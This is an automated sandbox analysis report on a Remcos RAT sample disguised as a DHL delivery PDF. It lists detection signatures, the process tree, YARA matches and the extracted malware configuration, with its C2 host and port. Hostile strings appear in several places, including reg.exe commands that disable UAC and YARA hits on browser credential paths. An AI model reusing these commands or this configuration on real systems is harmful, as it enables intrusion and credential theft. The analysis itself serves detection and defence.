Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe

Overview

General Information

Sample Name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
Analysis ID:491719
MD5:3808d4a11cbee20896cca28f9a3bcb9b
SHA1:b3a533d6e00ace2ec0612c9af66c6dd69c5180b3
SHA256:53c2e53d33f80e88b16cce06621f99680e0e5f387315cb81af97cee58080165a
Tags:DHLexegeoPRTRATRemcosRAT
Infos:

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Allocates memory in foreign processes
Contains functionality to steal Chrome passwords or cookies
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Creates processes with suspicious names
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe (PID: 6548 cmdline: 'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • mobsync.exe (PID: 1368 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
    • cmd.exe (PID: 7156 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6852 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5048 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 1680 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Iqzenco.exe (PID: 7112 cmdline: 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • mobsync.exe (PID: 4108 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
  • Iqzenco.exe (PID: 484 cmdline: 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • secinit.exe (PID: 6644 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.1.5 Pro", "Host:Port:Password": "ongod4ever.ddns.net:5652:0", "Assigned name": "ABLE GOD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VTGWT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\ocnezqI.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
    • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
    • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x5f86c:$str_b2: Executing file:
    • 0x60800:$str_b3: GetDirectListeningPort
    • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x603d4:$str_b5: licence_code.txt
    • 0x60278:$str_b7: \update.vbs
    • 0x5f8dc:$str_b9: Downloaded file:
    • 0x5f8a8:$str_b10: Downloading file:
    • 0x5f890:$str_b12: Failed to upload file:
    • 0x607c8:$str_b13: StartForward
    • 0x607e8:$str_b14: StopForward
    • 0x60220:$str_b15: fso.DeleteFile "
    • 0x601b4:$str_b16: On Error Resume Next
    • 0x60250:$str_b17: fso.DeleteFolder "
    • 0x5f880:$str_b18: Uploaded file:
    • 0x5f91c:$str_b19: Unable to delete:
    • 0x601e8:$str_b20: while fso.FileExists("
    00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x5f86c:$str_b2: Executing file:
      • 0x60800:$str_b3: GetDirectListeningPort
      • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x603d4:$str_b5: licence_code.txt
      • 0x60278:$str_b7: \update.vbs
      • 0x5f8dc:$str_b9: Downloaded file:
      • 0x5f8a8:$str_b10: Downloading file:
      • 0x5f890:$str_b12: Failed to upload file:
      • 0x607c8:$str_b13: StartForward
      • 0x607e8:$str_b14: StopForward
      • 0x60220:$str_b15: fso.DeleteFile "
      • 0x601b4:$str_b16: On Error Resume Next
      • 0x60250:$str_b17: fso.DeleteFolder "
      • 0x5f880:$str_b18: Uploaded file:
      • 0x5f91c:$str_b19: Unable to delete:
      • 0x601e8:$str_b20: while fso.FileExists("
      00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Click to see the 10 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        22.2.mobsync.exe.50601a02.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          22.2.mobsync.exe.50601a02.1.unpackREMCOS_RAT_variantsunknownunknown
          • 0x5d2bc:$str_a1: C:\Windows\System32\cmd.exe
          • 0x5d238:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5d238:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5c838:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x5ce90:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x5c46c:$str_b2: Executing file:
          • 0x5d400:$str_b3: GetDirectListeningPort
          • 0x5cc50:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x5cfd4:$str_b5: licence_code.txt
          • 0x5ce78:$str_b7: \update.vbs
          • 0x5c4dc:$str_b9: Downloaded file:
          • 0x5c4a8:$str_b10: Downloading file:
          • 0x5c490:$str_b12: Failed to upload file:
          • 0x5d3c8:$str_b13: StartForward
          • 0x5d3e8:$str_b14: StopForward
          • 0x5ce20:$str_b15: fso.DeleteFile "
          • 0x5cdb4:$str_b16: On Error Resume Next
          • 0x5ce50:$str_b17: fso.DeleteFolder "
          • 0x5c480:$str_b18: Uploaded file:
          • 0x5c51c:$str_b19: Unable to delete:
          • 0x5cde8:$str_b20: while fso.FileExists("
          5.2.mobsync.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            5.2.mobsync.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x5f86c:$str_b2: Executing file:
            • 0x60800:$str_b3: GetDirectListeningPort
            • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x603d4:$str_b5: licence_code.txt
            • 0x60278:$str_b7: \update.vbs
            • 0x5f8dc:$str_b9: Downloaded file:
            • 0x5f8a8:$str_b10: Downloading file:
            • 0x5f890:$str_b12: Failed to upload file:
            • 0x607c8:$str_b13: StartForward
            • 0x607e8:$str_b14: StopForward
            • 0x60220:$str_b15: fso.DeleteFile "
            • 0x601b4:$str_b16: On Error Resume Next
            • 0x60250:$str_b17: fso.DeleteFolder "
            • 0x5f880:$str_b18: Uploaded file:
            • 0x5f91c:$str_b19: Unable to delete:
            • 0x601e8:$str_b20: while fso.FileExists("
            26.2.secinit.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 19 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 22.2.mobsync.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Version": "3.1.5 Pro", "Host:Port:Password": "ongod4ever.ddns.net:5652:0", "Assigned name": "ABLE GOD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VTGWT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeVirustotal: Detection: 26%Perma Link
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeReversingLabs: Detection: 24%
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeReversingLabs: Detection: 24%
              Source: mobsync.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,5_2_004170AC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00406176 FindFirstFileW,FindNextFileW,5_2_00406176
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,22_2_004170AC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00406176 FindFirstFileW,FindNextFileW,22_2_00406176
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,22_2_0040A3AF
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,22_2_0040A5CA
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004456A9 FindFirstFileExA,22_2_004456A9
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_004077EE
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,22_2_00406930

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: ongod4ever.ddns.net
              Uses dynamic DNS servicesShow sources
              Source: unknownDNS query: name: ongod4ever.ddns.net
              Source: global trafficTCP traffic: 192.168.2.4:49771 -> 185.140.53.15:5652
              Source: Iqzenco.exe, 00000010.00000003.750864485.00000000007B1000.00000004.00000001.sdmpString found in binary or memory: https://bl30uw.sn.files.1drv.com/y4mGst0byrg6Ub0CK8iKHaximJI4M7D1uUmqxfl02ZpIfKXbkyeYXQLL6P2J6UxS4Yz
              Source: Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmpString found in binary or memory: https://bl30uw.sn.files.1drv.com/y4maOmpRLgEZgKpnLv-hczrMb96VqtMQDZd-m0g51QRpK-v8c65WYNUi2NOLDdGNQiU
              Source: Iqzenco.exe, 00000010.00000003.750846747.00000000007A3000.00000004.00000001.sdmpString found in binary or memory: https://bl30uw.sn.files.1drv.com/y4msI7_EyjC8cs97rdyt7ReCTl2WoedGiqx9hVOiugfpodFj4cXgoX5lAQfrGe41zrt
              Source: Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=97429F42E815B766&resid=97429F42E815B766%21166&authkey=AFRFbbm
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0041242F Sleep,URLDownloadToFileW,22_2_0041242F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004126A5 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,22_2_004126A5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004089BC GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,22_2_004089BC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004126A5 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,22_2_004126A5

              E-Banking Fraud:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
